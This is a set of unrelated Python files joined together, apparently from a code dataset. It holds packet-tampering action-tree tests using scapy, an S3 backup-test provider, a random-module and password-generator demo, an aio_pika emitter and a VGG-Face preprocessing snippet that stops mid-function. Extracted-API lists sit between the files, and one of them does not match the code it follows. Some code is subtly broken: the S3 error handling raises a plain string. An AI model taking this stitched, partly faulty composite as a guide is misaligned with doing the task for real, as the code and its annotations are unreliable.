    a = actions.tree.ActionTree("out", trigger=t)
    tamper = actions.tamper.TamperAction()
    tamper2 = actions.tamper.TamperAction()
    duplicate = actions.duplicate.DuplicateAction()
    # Adding None is a harmless no-op
    a.add_action(None)
    a.add_action(tamper)
    assert a.get_slots() == 1
    a.add_action(tamper2)
    assert a.get_slots() == 1
    # A branching action opens a second slot
    a.add_action(duplicate)
    assert a.get_slots() == 2
    t = actions.trigger.Trigger(None, None, None)
    a = actions.tree.ActionTree("out", trigger=t)
    drop = actions.drop.DropAction()
    # A terminal action (drop) leaves no open slots, so nothing can be added after it
    a.add_action(drop)
    assert a.get_slots() == 0
    add_success = a.add_action(tamper)
    assert not add_success
    assert a.get_slots() == 0
    rep = ""
    for s in a.string_repr(a.action_root):
        rep += s
    assert rep == "drop"
    print(str(a))
    assert a.parse("[TCP:flags:A]-duplicate(tamper{TCP:seq:corrupt},)-|", logging.getLogger("test"))
    for act in a:
        print(str(a))
    assert len(a) == 2
    assert a.get_slots() == 2
    # Requesting a specific action type must always return that type
    for _ in range(100):
        assert str(a.get_rand_action("out", request="DropAction")) == "drop"
def test_remove():
    """
    Tests remove
    """
    t = actions.trigger.Trigger(None, None, None)
    a = actions.tree.ActionTree("out", trigger=t)
    tamper = actions.tamper.TamperAction()
    tamper2 = actions.tamper.TamperAction()
    tamper3 = actions.tamper.TamperAction()
    # Removing from an empty tree fails
    assert not a.remove_action(tamper)
    a.add_action(tamper)
    assert a.remove_action(tamper)
    a.add_action(tamper)
    a.add_action(tamper2)
    a.add_action(tamper3)
    # Removing a middle node splices its child up to its parent
    assert a.remove_action(tamper2)
    assert tamper2 not in a
    assert tamper.left == tamper3
    assert not tamper.right
    assert len(a) == 2
    a = actions.tree.ActionTree("out", trigger=t)
    duplicate = actions.duplicate.DuplicateAction()
    tamper = actions.tamper.TamperAction()
    tamper2 = actions.tamper.TamperAction()
    tamper3 = actions.tamper.TamperAction()
    a.add_action(tamper)
    assert a.action_root == tamper
    duplicate.left = tamper2
    duplicate.right = tamper3
    a.add_action(duplicate)
    assert len(a) == 4
    # Removing a branching node promotes its left child
    assert a.remove_action(duplicate)
    assert duplicate not in a
    assert tamper.left == tamper2
    assert not tamper.right
    assert len(a) == 2
    a.parse("[TCP:flags:A]-|", logging.getLogger("test"))
    assert not a.remove_one(), "Cannot remove one with no action root"
def test_len():
    """len() of an action tree reports the number of distinct actions it holds."""
    trig = actions.trigger.Trigger(None, None, None)
    tree = actions.tree.ActionTree("out", trigger=trig)
    first = actions.tamper.TamperAction()
    second = actions.tamper.TamperAction()
    assert len(tree) == 0, "__len__ returned wrong length"
    tree.add_action(first)
    assert len(tree) == 1, "__len__ returned wrong length"
    # Adding the same action object twice is a no-op
    tree.add_action(first)
    assert len(tree) == 1, "__len__ returned wrong length"
    tree.add_action(second)
    assert len(tree) == 2, "__len__ returned wrong length"
    tree.add_action(actions.duplicate.DuplicateAction())
    assert len(tree) == 3, "__len__ returned wrong length"
def test_contains():
    """
    Tests contains method
    """
    t = actions.trigger.Trigger(None, None, None)
    a = actions.tree.ActionTree("out", trigger=t)
    tamper = actions.tamper.TamperAction()
    tamper2 = actions.tamper.TamperAction()
    tamper3 = actions.tamper.TamperAction()
    # Empty tree contains nothing
    assert not a.contains(tamper), "contains incorrect behavior"
    assert not a.contains(tamper2), "contains incorrect behavior"
    a.add_action(tamper)
    assert a.contains(tamper), "contains incorrect behavior"
    assert not a.contains(tamper2), "contains incorrect behavior"
    # Duplicate adds are rejected and do not change membership
    add_success = a.add_action(tamper)
    assert not add_success, "added duplicate action"
    assert a.contains(tamper), "contains incorrect behavior"
    assert not a.contains(tamper2), "contains incorrect behavior"
    a.add_action(tamper2)
    assert a.contains(tamper), "contains incorrect behavior"
    assert a.contains(tamper2), "contains incorrect behavior"
    # Membership follows removal and re-insertion
    a.remove_action(tamper2)
    assert a.contains(tamper), "contains incorrect behavior"
    assert not a.contains(tamper2), "contains incorrect behavior"
    a.add_action(tamper2)
    assert a.contains(tamper), "contains incorrect behavior"
    assert a.contains(tamper2), "contains incorrect behavior"
    remove_success = a.remove_action(tamper)
    assert remove_success
    assert not a.contains(tamper), "contains incorrect behavior"
    assert a.contains(tamper2), "contains incorrect behavior"
    a.add_action(tamper3)
    assert a.contains(tamper3), "contains incorrect behavior"
    assert len(a) == 2, "len incorrect return"
    remove_success = a.remove_action(tamper2)
    assert remove_success
def test_iter():
    """Iterating an action tree visits each of its action nodes."""
    trig = actions.trigger.Trigger(None, None, None)
    tree = actions.tree.ActionTree("out", trigger=trig)
    syn = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
    rst = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
    assert tree.add_action(syn)
    assert tree.add_action(rst)
    # Re-adding an existing action must fail
    assert not tree.add_action(syn)
    for node in tree:
        print(node)
def test_run():
    """
    Tests running packets through the chain.
    """
    logger = logging.getLogger("test")
    t = actions.trigger.Trigger(None, None, None)
    a = actions.tree.ActionTree("out", trigger=t)
    tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
    tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
    duplicate = actions.duplicate.DuplicateAction()
    duplicate2 = actions.duplicate.DuplicateAction()
    drop = actions.drop.DropAction()
    packet = layers.packet.Packet(IP()/TCP())
    # A single tamper rewrites the flags in place
    a.add_action(tamper)
    packets = a.run(packet, logging.getLogger("test"))
    assert len(packets) == 1
    assert None not in packets
    assert packets[0].get("TCP", "flags") == "S"
    a.add_action(tamper2)
    print(str(a))
    packet = layers.packet.Packet(IP()/TCP())
    assert not a.add_action(tamper), "tree added duplicate action"
    # Chained tampers apply in order; the last write wins
    packets = a.run(packet, logging.getLogger("test"))
    assert len(packets) == 1
    assert None not in packets
    assert packets[0].get("TCP", "flags") == "R"
    print(str(a))
    a.remove_action(tamper2)
    a.remove_action(tamper)
    # A bare duplicate emits two identical packets
    a.add_action(duplicate)
    packet = layers.packet.Packet(IP()/TCP(flags="RA"))
    packets = a.run(packet, logging.getLogger("test"))
    assert len(packets) == 2
    assert None not in packets
    assert packets[0][TCP].flags == "RA"
    assert packets[1][TCP].flags == "RA"
    print(str(a))
    # Each duplicate branch can apply its own tamper
    duplicate.left = tamper
    duplicate.right = tamper2
    packet = layers.packet.Packet(IP()/TCP(flags="RA"))
    print("ABUT TO RUN")
    packets = a.run(packet, logging.getLogger("test"))
    assert len(packets) == 2
    assert None not in packets
    print(str(a))
    print(str(packets[0]))
    print(str(packets[1]))
    assert packets[0][TCP].flags == "S"
    assert packets[1][TCP].flags == "R"
    print(str(a))
    # A nested duplicate under the left tamper yields a third packet
    tamper.left = duplicate2
    packet = layers.packet.Packet(IP()/TCP(flags="RA"))
    packets = a.run(packet, logging.getLogger("test"))
    assert len(packets) == 3
    assert None not in packets
    assert packets[0][TCP].flags == "S"
    assert packets[1][TCP].flags == "S"
    assert packets[2][TCP].flags == "R"
    print(str(a))
    # A drop under the right tamper removes that branch's packet
    tamper2.left = drop
    packet = layers.packet.Packet(IP()/TCP(flags="RA"))
    packets = a.run(packet, logging.getLogger("test"))
    assert len(packets) == 2
    assert None not in packets
    assert packets[0][TCP].flags == "S"
    assert packets[1][TCP].flags == "S"
    print(str(a))
    assert a.remove_action(duplicate2)
    # With drops on every path, no packets survive
    tamper.left = actions.drop.DropAction()
    packet = layers.packet.Packet(IP()/TCP(flags="RA"))
    packets = a.run(packet, logger )
    assert len(packets) == 0
    print(str(a))
    a.parse("[TCP:flags:A]-duplicate(tamper{TCP:flags:replace:R}(tamper{TCP:chksum:replace:14239},),duplicate(tamper{TCP:flags:replace:S},))-|", logger)
    packet = layers.packet.Packet(IP()/TCP(flags="A"))
    assert a.check(packet, logger)
    packets = a.run(packet, logger)
    assert len(packets) == 3
    assert packets[0][TCP].flags == "R"
    assert packets[1][TCP].flags == "S"
    assert packets[2][TCP].flags == "A"
def test_index():
    """Indexing a tree returns actions in insertion order; bad indices yield None."""
    tree = actions.tree.ActionTree("out")
    first = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
    second = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
    third = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="F")
    assert tree.add_action(first)
    assert tree[0] == first
    # Out-of-range access is falsy rather than raising
    assert not tree[1]
    assert tree.add_action(second)
    assert tree[0] == first
    assert tree[1] == second
    # Negative indices count from the end
    assert tree[-1] == second
    assert not tree[10]
    assert tree.add_action(third)
    assert tree[-1] == third
    assert not tree[-11]
def test_mate():
    """
    Tests mate primitive
    """
    logger = logging.getLogger("test")
    t = actions.trigger.Trigger("field", "flags", "TCP")
    a = actions.tree.ActionTree("out", trigger=t)
    assert not a.choose_one()
    tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
    tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
    duplicate = actions.duplicate.DuplicateAction()
    duplicate2 = actions.duplicate.DuplicateAction()
    drop = actions.drop.DropAction()
    other_a = actions.tree.ActionTree("out", trigger=t)
    assert not a.mate(other_a), "Can't mate empty trees"
    assert a.add_action(tamper)
    assert other_a.add_action(tamper2)
    assert a.choose_one() == tamper
    assert other_a.choose_one() == tamper2
    # Root nodes have no parent
    assert a.get_parent(tamper) == (None, None)
    assert other_a.get_parent(tamper2) == (None, None)
    assert a.add_action(duplicate)
    assert a.get_parent(duplicate) == (tamper, "left")
    duplicate.right = drop
    assert a.get_parent(drop) == (duplicate, "right")
    assert other_a.add_action(duplicate2)
    # Test mating a full tree with a full tree
    assert str(a) == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(duplicate(,drop),)-|"
    assert str(other_a) == "[TCP:flags:0]-tamper{TCP:flags:replace:R}(duplicate,)-|"
    assert a.swap(duplicate, other_a, duplicate2)
    # After the swap the two duplicate subtrees have exchanged trees wholesale
    assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(duplicate,)-|"
    assert str(other_a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:R}(duplicate(,drop),)-|"
    assert len(a) == 2
    assert len(other_a) == 3
    assert duplicate2 not in other_a
    assert duplicate not in a
    assert tamper.left == duplicate2
    assert tamper2.left == duplicate
    assert other_a.get_parent(duplicate) == (tamper2, "left")
    assert a.get_parent(duplicate2) == (tamper, "left")
    assert other_a.get_parent(drop) == (duplicate, "right")
    assert a.get_parent(None) == (None, None)
    # Test mating two trees with just root nodes
    t = actions.trigger.Trigger("field", "flags", "TCP")
    a = actions.tree.ActionTree("out", trigger=t)
    assert not a.choose_one()
    tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
    tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
    duplicate = actions.duplicate.DuplicateAction()
    duplicate2 = actions.duplicate.DuplicateAction()
    drop = actions.drop.DropAction()
    other_a = actions.tree.ActionTree("out", trigger=t)
    assert not a.mate(other_a)
    assert a.add_action(duplicate)
    assert other_a.add_action(duplicate2)
    assert a.mate(other_a)
    assert a.action_root == duplicate2
    assert other_a.action_root == duplicate
    assert not duplicate.left and not duplicate.right
    assert not duplicate2.left and not duplicate2.right
    # Confirm that no nodes have been aliased or connected between the trees
    for node in a:
        for other_node in other_a:
            assert not node.left == other_node
            assert not node.right == other_node
    # Test mating two trees where one is empty
    assert a.remove_action(duplicate2)
    # This should swap the duplicate action to be the action root of the other tree
    assert str(a) == "[TCP:flags:0]-|"
    assert str(other_a) == "[TCP:flags:0]-duplicate-|"
    assert a.mate(other_a)
    assert not other_a.action_root
    assert a.action_root == duplicate
    assert len(a) == 1
    assert len(other_a) == 0
    # Confirm that no nodes have been aliased or connected between the trees
    for node in a:
        for other_node in other_a:
            if other_node:
                assert not node.left == other_node
                assert not node.right == other_node
    assert a.parse("[TCP:flags:0]-tamper{TCP:flags:replace:S}(duplicate(,drop),)-|", logger)
    drop = a.action_root.left.right
    assert str(drop) == "drop"
    # Note that this will return a valid ActionTree, but because it is empty,
    # it is technically a False-y value, as it's length is 0
    assert other_a.parse("[TCP:flags:0]-|", logger) == other_a
    # Swapping against None moves the node to become the other tree's root
    a.swap(drop, other_a, None)
    assert other_a.action_root == drop
    assert not a.action_root.left.right
    assert str(other_a) == "[TCP:flags:0]-drop-|"
    assert str(a) == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(duplicate,)-|"
    other_a.swap(drop, a, a.action_root.left)
    # Confirm that no nodes have been aliased or connected between the trees
    for node in a:
        for other_node in other_a:
            if other_node:
                assert not node.left == other_node
                assert not node.right == other_node
    assert str(other_a) == "[TCP:flags:0]-duplicate-|"
    assert str(a) == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(drop,)-|"
    a.parse("[TCP:flags:0]-drop-|", logger)
    other_a.parse("[TCP:flags:0]-duplicate(drop,drop)-|", logger)
    a_drop = a.action_root
    other_duplicate = other_a.action_root
    # Swapping the roots exchanges the entire trees
    a.swap(a_drop, other_a, other_duplicate)
    print(str(a))
    print(str(other_a))
    assert str(other_a) == "[TCP:flags:0]-drop-|"
    assert str(a) == "[TCP:flags:0]-duplicate(drop,drop)-|"
    duplicate = actions.duplicate.DuplicateAction()
    duplicate2 = actions.duplicate.DuplicateAction()
    drop = actions.drop.DropAction()
    drop2 = actions.drop.DropAction()
    drop3 = actions.drop.DropAction()
    a = actions.tree.ActionTree("out", trigger=t)
    a.add_action(duplicate)
    a.add_action(drop)
    a.add_action(drop2)
    assert str(a) == "[TCP:flags:0]-duplicate(drop,drop)-|"
    assert a.get_slots() == 0
    other_a = actions.tree.ActionTree("out", trigger=t)
    other_a.add_action(drop3)
    # Swapping equivalent leaves leaves the string representation unchanged
    a.swap(drop, other_a, drop3)
    assert str(a) == "[TCP:flags:0]-duplicate(drop,drop)-|"
    a.swap(drop3, other_a, drop)
    assert str(a) == "[TCP:flags:0]-duplicate(drop,drop)-|"
    assert a.mate(other_a)
def test_choose_one():
    """choose_one returns None for an empty tree and samples over all nodes otherwise."""
    tree = actions.tree.ActionTree("out")
    drop = actions.drop.DropAction()
    # Nothing to choose in an empty tree
    assert not tree.choose_one()
    assert tree.add_action(drop)
    assert tree.choose_one() == drop
    assert tree.remove_action(drop)
    assert not tree.choose_one()
    dup = actions.duplicate.DuplicateAction()
    tree.add_action(dup)
    assert tree.choose_one() == dup
    dup.left = drop
    assert tree.choose_one() in [dup, drop]
    # Sample repeatedly to confirm every node is eventually selected
    chosen = {tree.choose_one() for _ in range(10000)}
    assert chosen == {dup, drop}
| [
"logging.getLogger",
"os.path.exists",
"scapy.all.TCP",
"scapy.all.IP",
"os.remove"
] | [((425, 450), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (442, 450), False, 'import logging\n'), ((1143, 1168), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (1160, 1168), False, 'import logging\n'), ((1892, 1917), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (1909, 1917), False, 'import logging\n'), ((2463, 2488), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (2480, 2488), False, 'import logging\n'), ((6251, 6277), 'os.path.exists', 'os.path.exists', (['"""tree.png"""'], {}), "('tree.png')\n", (6265, 6277), False, 'import os\n'), ((6282, 6303), 'os.remove', 'os.remove', (['"""tree.png"""'], {}), "('tree.png')\n", (6291, 6303), False, 'import os\n'), ((6557, 6582), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (6574, 6582), False, 'import logging\n'), ((7228, 7253), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (7245, 7253), False, 'import logging\n'), ((16632, 16657), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (16649, 16657), False, 'import logging\n'), ((20492, 20517), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (20509, 20517), False, 'import logging\n'), ((6410, 6436), 'os.path.exists', 'os.path.exists', (['"""tree.png"""'], {}), "('tree.png')\n", (6424, 6436), False, 'import os\n'), ((8229, 8254), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (8246, 8254), False, 'import logging\n'), ((8562, 8587), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (8579, 8587), False, 'import logging\n'), ((12186, 12211), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (12203, 12211), False, 'import logging\n'), ((13606, 13631), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (13623, 13631), 
False, 'import logging\n'), ((17195, 17220), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (17212, 17220), False, 'import logging\n'), ((17517, 17542), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (17534, 17542), False, 'import logging\n'), ((17841, 17866), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (17858, 17866), False, 'import logging\n'), ((18196, 18221), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (18213, 18221), False, 'import logging\n'), ((18567, 18592), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (18584, 18592), False, 'import logging\n'), ((18901, 18926), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (18918, 18926), False, 'import logging\n'), ((1266, 1270), 'scapy.all.IP', 'IP', ([], {}), '()\n', (1268, 1270), False, 'from scapy.all import IP, TCP\n'), ((1271, 1285), 'scapy.all.TCP', 'TCP', ([], {'flags': '"""A"""'}), "(flags='A')\n", (1274, 1285), False, 'from scapy.all import IP, TCP\n'), ((1350, 1360), 'scapy.all.IP', 'IP', ([], {'ttl': '(64)'}), '(ttl=64)\n', (1352, 1360), False, 'from scapy.all import IP, TCP\n'), ((1361, 1376), 'scapy.all.TCP', 'TCP', ([], {'flags': '"""RA"""'}), "(flags='RA')\n", (1364, 1376), False, 'from scapy.all import IP, TCP\n'), ((1688, 1698), 'scapy.all.IP', 'IP', ([], {'ttl': '(15)'}), '(ttl=15)\n', (1690, 1698), False, 'from scapy.all import IP, TCP\n'), ((1699, 1714), 'scapy.all.TCP', 'TCP', ([], {'flags': '"""RA"""'}), "(flags='RA')\n", (1702, 1714), False, 'from scapy.all import IP, TCP\n'), ((2017, 2021), 'scapy.all.IP', 'IP', ([], {}), '()\n', (2019, 2021), False, 'from scapy.all import IP, TCP\n'), ((2022, 2036), 'scapy.all.TCP', 'TCP', ([], {'flags': '"""A"""'}), "(flags='A')\n", (2025, 2036), False, 'from scapy.all import IP, TCP\n'), ((2168, 2172), 'scapy.all.IP', 'IP', ([], {}), '()\n', (2170, 2172), False, 'from 
scapy.all import IP, TCP\n'), ((2173, 2187), 'scapy.all.TCP', 'TCP', ([], {'flags': '"""A"""'}), "(flags='A')\n", (2176, 2187), False, 'from scapy.all import IP, TCP\n'), ((17130, 17134), 'scapy.all.IP', 'IP', ([], {}), '()\n', (17132, 17134), False, 'from scapy.all import IP, TCP\n'), ((17135, 17140), 'scapy.all.TCP', 'TCP', ([], {}), '()\n', (17138, 17140), False, 'from scapy.all import IP, TCP\n'), ((17410, 17414), 'scapy.all.IP', 'IP', ([], {}), '()\n', (17412, 17414), False, 'from scapy.all import IP, TCP\n'), ((17415, 17420), 'scapy.all.TCP', 'TCP', ([], {}), '()\n', (17418, 17420), False, 'from scapy.all import IP, TCP\n'), ((17791, 17795), 'scapy.all.IP', 'IP', ([], {}), '()\n', (17793, 17795), False, 'from scapy.all import IP, TCP\n'), ((17796, 17811), 'scapy.all.TCP', 'TCP', ([], {'flags': '"""RA"""'}), "(flags='RA')\n", (17799, 17811), False, 'from scapy.all import IP, TCP\n'), ((18121, 18125), 'scapy.all.IP', 'IP', ([], {}), '()\n', (18123, 18125), False, 'from scapy.all import IP, TCP\n'), ((18126, 18141), 'scapy.all.TCP', 'TCP', ([], {'flags': '"""RA"""'}), "(flags='RA')\n", (18129, 18141), False, 'from scapy.all import IP, TCP\n'), ((18517, 18521), 'scapy.all.IP', 'IP', ([], {}), '()\n', (18519, 18521), False, 'from scapy.all import IP, TCP\n'), ((18522, 18537), 'scapy.all.TCP', 'TCP', ([], {'flags': '"""RA"""'}), "(flags='RA')\n", (18525, 18537), False, 'from scapy.all import IP, TCP\n'), ((18851, 18855), 'scapy.all.IP', 'IP', ([], {}), '()\n', (18853, 18855), False, 'from scapy.all import IP, TCP\n'), ((18856, 18871), 'scapy.all.TCP', 'TCP', ([], {'flags': '"""RA"""'}), "(flags='RA')\n", (18859, 18871), False, 'from scapy.all import IP, TCP\n'), ((19204, 19208), 'scapy.all.IP', 'IP', ([], {}), '()\n', (19206, 19208), False, 'from scapy.all import IP, TCP\n'), ((19209, 19224), 'scapy.all.TCP', 'TCP', ([], {'flags': '"""RA"""'}), "(flags='RA')\n", (19212, 19224), False, 'from scapy.all import IP, TCP\n'), ((19498, 19502), 'scapy.all.IP', 'IP', ([], 
{}), '()\n', (19500, 19502), False, 'from scapy.all import IP, TCP\n'), ((19503, 19517), 'scapy.all.TCP', 'TCP', ([], {'flags': '"""A"""'}), "(flags='A')\n", (19506, 19517), False, 'from scapy.all import IP, TCP\n')] |
#!/usr/bin/python3
import json
import re
import boto3
import botocore
from . import provider
class S3(provider.Provider):
    def __init__(self, access_key_id, bucket, cacert, endpoint, no_ssl_verify, region, secret_access_key, staging_directory):
        """Create a new S3 provider which allows interaction with S3 masked behind the common 'Provider' interface. All
        required parameters should be those parsed from the ini.
        """
        super().__init__(access_key_id, bucket, cacert, endpoint, no_ssl_verify, region, secret_access_key, staging_directory)
        # boto3 will raise an exception if given an empty string as the endpoint_url so we must construct a kwargs
        # dictionary and conditionally populate it.
        kwargs = {}
        if self.access_key_id:
            kwargs['aws_access_key_id'] = self.access_key_id
        if self.cacert:
            kwargs['verify'] = self.cacert
        if self.endpoint != '':
            kwargs['endpoint_url'] = self.endpoint
        if self.no_ssl_verify:
            # Supplying no_ssl_verify will override the cacert value if supplied e.g. they are mutually exclusive
            kwargs['verify'] = False
        if self.region:
            kwargs['region_name'] = self.region
        if self.secret_access_key:
            kwargs['aws_secret_access_key'] = self.secret_access_key
        # Single boto3 service resource reused by all of the other methods on this class
        self.resource = boto3.resource('s3', **kwargs)
def schema_prefix(self):
"""See super class"""
return 's3://'
def setup(self):
"""See super class"""
configuration = {}
if self.region:
configuration['LocationConstraint'] = self.region
try:
self.resource.create_bucket(Bucket=self.bucket, CreateBucketConfiguration=configuration)
except botocore.exceptions.ClientError as error:
error_code = error.response['Error']['Code']
if error_code != 'BucketAlreadyExists':
raise error
def teardown(self, info, remote_client):
"""See super class"""
bucket = self.resource.Bucket(self.bucket)
# Delete all the remaining objects
try:
for obj in bucket.objects.all():
obj.delete()
except botocore.exceptions.ClientError as error:
error_code = error.response['Error']['Code']
if error_code == 'NoSuchBucket':
# Some tests remove the bucket after it's created/cleaned, if the bucket doesn't exist then all we need
# to do is clean the staging directory.
self._remove_staging_directory(info, remote_client)
return
raise error_code
# Abort all the remaining multipart uploads. We ignore any 'NoSuchUpload' errors because we don't care if the
# upload doesn't exist; we are trying to remove it.
for upload in bucket.multipart_uploads.all():
try:
upload.abort()
except botocore.exceptions.ClientError as error:
error_code = error.response['Error']['Code']
if error_code != "NoSuchUpload":
raise error
# Remove the staging directory because cbbackupmgr has validation to ensure that are unique to each archive
self._remove_staging_directory(info, remote_client)
def remove_bucket(self):
"""See super class"""
self.resource.Bucket(self.bucket).delete()
def get_json_object(self, key):
"""See super class"""
obj = None
try:
obj = json.loads(self.resource.Object(self.bucket, key).get()['Body'].read())
except botocore.exceptions.ClientError as error:
error_code = error.response['Error']['Code']
if error_code not in ('NoSuchKey', 'KeyNotFound'):
raise error_code
return obj
def list_objects(self, prefix=None):
"""See super class"""
keys = []
kwargs = {}
if prefix:
kwargs['Prefix'] = prefix
for obj in self.resource.Bucket(self.bucket).objects.filter(**kwargs):
keys.append(obj.key)
return keys
def delete_objects(self, prefix):
"""See super class"""
kwargs = {}
if prefix:
kwargs['Prefix'] = prefix
for obj in self.resource.Bucket(self.bucket).objects.filter(**kwargs):
obj.delete()
def list_backups(self, archive, repo):
"""See super class"""
pattern = re.compile("([0-9]+)-(0[1-9]|1[012])-(0[1-9]|[12][0-9]|3[01])[Tt]([01][0-9]|2[0-3])_([0-5][0-9])_([0-5][0-9]|60)(\.[0-9]+)?(([Zz])|([\+|\-]([01][0-9]|2[0-3])_[0-5][0-9]))")
backups = []
for obj in self.resource.Bucket(self.bucket).objects.filter(Prefix=f"{archive}/{repo}"):
res = pattern.search(obj.key)
if res and res.group() not in backups:
backups.append(res.group())
return backups
def num_multipart_uploads(self):
return sum(1 for _ in self.resource.Bucket(self.bucket).multipart_uploads.all())
provider.Provider.register(S3)
| [
"boto3.resource",
"re.compile"
] | [((1389, 1419), 'boto3.resource', 'boto3.resource', (['"""s3"""'], {}), "('s3', **kwargs)\n", (1403, 1419), False, 'import boto3\n'), ((4528, 4713), 're.compile', 're.compile', (['"""([0-9]+)-(0[1-9]|1[012])-(0[1-9]|[12][0-9]|3[01])[Tt]([01][0-9]|2[0-3])_([0-5][0-9])_([0-5][0-9]|60)(\\\\.[0-9]+)?(([Zz])|([\\\\+|\\\\-]([01][0-9]|2[0-3])_[0-5][0-9]))"""'], {}), "(\n '([0-9]+)-(0[1-9]|1[012])-(0[1-9]|[12][0-9]|3[01])[Tt]([01][0-9]|2[0-3])_([0-5][0-9])_([0-5][0-9]|60)(\\\\.[0-9]+)?(([Zz])|([\\\\+|\\\\-]([01][0-9]|2[0-3])_[0-5][0-9]))'\n )\n", (4538, 4713), False, 'import re\n')] |
import random
import secrets
import string

# random.randint(a, b) -> integer between a and b (inclusive)
# random.uniform(a, b) -> float between a and b

# Float between 0.0 and 1.0
flutuante = random.random()

# Random integer drawn from range(900, 1000, 10), i.e. a multiple of 10
inteiro = random.randrange(900, 1000, 10)

lista = ['Luiz', 'Otávio', 'Maria', 'Rose', 'Jenny', 'Danilo', 'Felipe']

# sample() draws two *distinct* names from the list
sorteio = random.sample(lista, 2)
# random.choices(lista, k=2) would draw two names but may repeat the same one
# random.choice(lista) would draw a single name

# Shuffle the list in place
random.shuffle(lista)

# Generate a random password.
# SECURITY FIX: use 'secrets' rather than 'random' for anything security
# sensitive - 'random' is not cryptographically strong.
letras = string.ascii_letters
digitos = string.digits
caracteres = '!@#$%&*._-'
geral = letras + digitos + caracteres
senha = "".join(secrets.choice(geral) for _ in range(20))
print(senha)
| [
"random.sample",
"random.shuffle",
"random.randrange",
"random.choices",
"random.random"
] | [((252, 267), 'random.random', 'random.random', ([], {}), '()\n', (265, 267), False, 'import random\n'), ((384, 415), 'random.randrange', 'random.randrange', (['(900)', '(1000)', '(10)'], {}), '(900, 1000, 10)\n', (400, 415), False, 'import random\n'), ((551, 574), 'random.sample', 'random.sample', (['lista', '(2)'], {}), '(lista, 2)\n', (564, 574), False, 'import random\n'), ((816, 837), 'random.shuffle', 'random.shuffle', (['lista'], {}), '(lista)\n', (830, 837), False, 'import random\n'), ((1016, 1043), 'random.choices', 'random.choices', (['geral'], {'k': '(20)'}), '(geral, k=20)\n', (1030, 1043), False, 'import random\n')] |
import json
from aio_pika import Message, DeliveryMode, ExchangeType
from lib.ipc.util import poll_for_async_connection
class Emitter:
    """Publishes JSON-encoded events to the 'events' topic exchange over AMQP."""

    def __init__(self):
        # Both attributes are populated by connect(); None until then.
        self.connection = None
        self.event_exchange = None

    async def connect(self, loop):
        """Open the AMQP connection, declare the topic exchange and return self."""
        self.connection = await poll_for_async_connection(loop)
        channel = await self.connection.channel()
        self.event_exchange = await channel.declare_exchange(
            'events', ExchangeType.TOPIC
        )
        return self

    async def close(self):
        """Close the underlying AMQP connection."""
        await self.connection.close()

    async def emit(self, routing_key, body):
        """Serialise *body* as JSON and publish it under *routing_key*."""
        payload = json.dumps(body).encode()
        message = Message(payload, delivery_mode=DeliveryMode.PERSISTENT)
        # Publish the persistent message to the topic exchange.
        await self.event_exchange.publish(message, routing_key=routing_key)
| [
"json.dumps",
"lib.ipc.util.poll_for_async_connection"
] | [((325, 356), 'lib.ipc.util.poll_for_async_connection', 'poll_for_async_connection', (['loop'], {}), '(loop)\n', (350, 356), False, 'from lib.ipc.util import poll_for_async_connection\n'), ((695, 711), 'json.dumps', 'json.dumps', (['body'], {}), '(body)\n', (705, 711), False, 'import json\n')] |
# Copyright 2019 Systems & Technology Research, LLC
# Use of this software is governed by the license.txt file.
import os
import numpy as np
import torch
import torch.nn as nn
import torchvision.transforms as transforms
import torch.nn.functional as F
from PIL import ImageFilter
def prepare_vggface_image(img):
    """
    Convert an RGB byte image to a FloatTensor suitable for processing with the network.
    This function assumes the image has already been resized, cropped, jittered, etc.
    """
    # VGG-Face mean pixel, in BGR channel order.
    mean_bgr = np.array((93.5940, 104.7624, 129.1863))
    # Reorder channels RGB -> BGR, then subtract the mean pixel value.
    centred = np.array(img)[..., [2, 1, 0]] - mean_bgr
    # Permute HxWx3 -> 3xHxW so the tensor is channel-first.
    chw = np.rollaxis(centred, 2, 0)
    return torch.from_numpy(chw).float()
def generate_random_blur(blur_radius, blur_prob):
    """Return a transform that Gaussian-blurs an image with probability *blur_prob*."""
    def random_blur(img):
        # Draw once per image; skip the blur when the draw falls at or above blur_prob.
        if np.random.random() >= blur_prob:
            return img
        return img.filter(ImageFilter.GaussianBlur(radius=blur_radius))
    return random_blur
""" Function suitable for transform argument of datasets.ImageFolder """
def vggface_preprocess(jitter=False, blur_radius=None, blur_prob=1.0):
